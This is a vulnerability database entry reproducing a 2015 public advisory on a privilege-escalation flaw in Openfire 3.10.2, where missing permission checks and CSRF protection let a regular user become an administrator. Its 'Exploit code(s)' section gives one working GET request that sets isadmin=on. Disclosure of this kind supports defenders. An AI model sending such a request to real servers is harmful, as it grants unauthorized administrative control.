Openfire Privilege Escalation

vendor:

Openfire

by:

hyp3rlinx

7,5

CVSS

HIGH

Privilege escalation

N/A

CWE

Product Name: Openfire

Affected Version From: Openfire 3.10.2

Affected Version To: Openfire 3.10.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Local or Remote

2015

Openfire Privilege Escalation

No check is made when updating the user privileges, allowing regular user to become an admin. Escalation can be done remotely too if user is logged in as no CSRF token exist.

Mitigation:

Ensure that proper checks are made when updating user privileges.

Source

Exploit-DB raw data:

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).



Vulnerability Type:
===================
Privilege escalation



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.





Exploit code(s):
===============

Become admin!

http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on




Disclosure Timeline:
=========================================================

Vendor Notification: NA
Sept 14, 2015 : Public Disclosure




Exploitation Technique:
=======================
Local or Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] Openfire 3.10.2


Vulnerable Parameter(s):        [+] isadmin


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx